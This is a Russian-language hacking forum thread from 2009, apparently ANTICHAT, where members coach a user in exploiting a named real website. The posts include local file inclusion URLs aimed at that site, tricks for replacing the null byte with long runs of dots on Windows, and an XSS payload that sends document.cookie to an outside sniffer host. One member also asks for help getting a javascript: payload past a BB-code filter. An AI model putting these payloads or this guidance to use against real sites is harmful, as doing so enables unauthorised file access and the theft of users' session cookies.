HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 697 из 2422 « Первая < 197597647687 693 694 695 696 697 698 699 700 701 70774779711971697 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 08.05.2009, 13:47
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


По умолчанию
Цитата:
Сообщение от geforce  
Ну вижу срезалось!

И что мне теперь с этим делать???
Код:
http://wow.alania.net/index.php?page=../index
http://wow.alania.net/?page=../config
Последний раз редактировалось Pashkela; 08.05.2009 в 14:25..
 
Ответить с цитированием

  #2  
Старый 07.05.2009, 18:30
Iceangel_
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию
2geforce
попробуй аналог нуллбайту
raz0r.name/articles/null-byte-alternative/
 
Ответить с цитированием

  #3  
Старый 07.05.2009, 18:38
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию
http://forum.antichat.ru/thread20140.html
 
Ответить с цитированием

  #4  
Старый 07.05.2009, 18:50
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


По умолчанию
2geforce
Ты можешь составить запрос:
Код:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
(c)Micr0b
Для перенаправления куков на сниффер.
 
Ответить с цитированием

  #5  
Старый 07.05.2009, 20:22
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


По умолчанию
На счёт доступа к БД через локальный инклуд, я хз, ниразу не слышал...
А вот почитать файлы на сервере можно, остаётся узнать, на сколько дирикторий ниже находится нужный нам файл. Вместо символа "<"(0x3C) используй "."(0x2E) для того, чтобы иметь возможность выйти из текущей директории.
 
Ответить с цитированием

  #6  
Старый 07.05.2009, 20:32
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию
Цитата:
Сообщение от -m0rgan-  
А вот почитать файлы на сервере можно, остаётся узнать, на сколько дирикторий ниже находится нужный нам файл. Вместо символа "<"(0x3C) используй "."(0x2E) для того, чтобы иметь возможность выйти из текущей директории.
во первых
сервер виндовый о чем явственно гласит надпись "in Y:\home\78.110.144.12\www\index.php"
значит никакого /etc/passwd

во-вторых
замена нулл-байта для винды - 255 точек(если пямять не изменяет)

upd: 266 ,пардон ,точек. более универсальная весч.
Последний раз редактировалось geezer.code; 07.05.2009 в 20:38..
 
Ответить с цитированием

  #7  
Старый 07.05.2009, 21:21
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Question
Цитата:
Сообщение от geezer.code  
во первых
сервер виндовый о чем явственно гласит надпись "in Y:\home\78.110.144.12\www\index.php"
значит никакого /etc/passwd

во-вторых
замена нулл-байта для винды - 255 точек(если пямять не изменяет)

upd: 266 ,пардон ,точек. более универсальная весч.
НУ ПОМОГИ ТОГДА!

По подробнее можешь расписать???
 
Ответить с цитированием

  #8  
Старый 08.05.2009, 08:52
AET
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106

Репутация: -2
По умолчанию
Цитата:
Сообщение от geforce  
НУ ПОМОГИ ТОГДА!

По подробнее можешь расписать???
зачем тебе это а там ведь инклуда. инклуду уже во многих саитах зашешают только не опотныие програмисты могут сделать такое. помоему ты хочеш узнать что можно сделать с таким ошибкой я тоже хотел бы узнать что можно сделать если наити на саитах такие инклуд ошибки и к чему они приведут если оно попоидет в руку хакера
 
Ответить с цитированием

  #9  
Старый 07.05.2009, 20:41
de0n1k
Новичок
Регистрация: 18.07.2008
Сообщений: 4
Провел на форуме:
31731

Репутация: 0
По умолчанию
Помогите обойти фильтр! Не выводится алерт!

[im*g]http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()[/im*g]
 
Ответить с цитированием

  #10  
Старый 07.05.2009, 20:52
25:17
Banned
Регистрация: 07.05.2009
Сообщений: 11
Провел на форуме:
88555

Репутация: 11
По умолчанию
Цитата:
Сообщение от de0n1k  
Помогите обойти фильтр! Не выводится алерт!

[im*g]http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()[/im*g]
а как он обрабатывает этот ББ-код в ХТМЛ? кинь исходник странички в этом месте
 
Ответить с цитированием
Ответ
Страница 697 из 2422 « Первая < 197597647687 693 694 695 696 697 698 699 700 701 70774779711971697 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.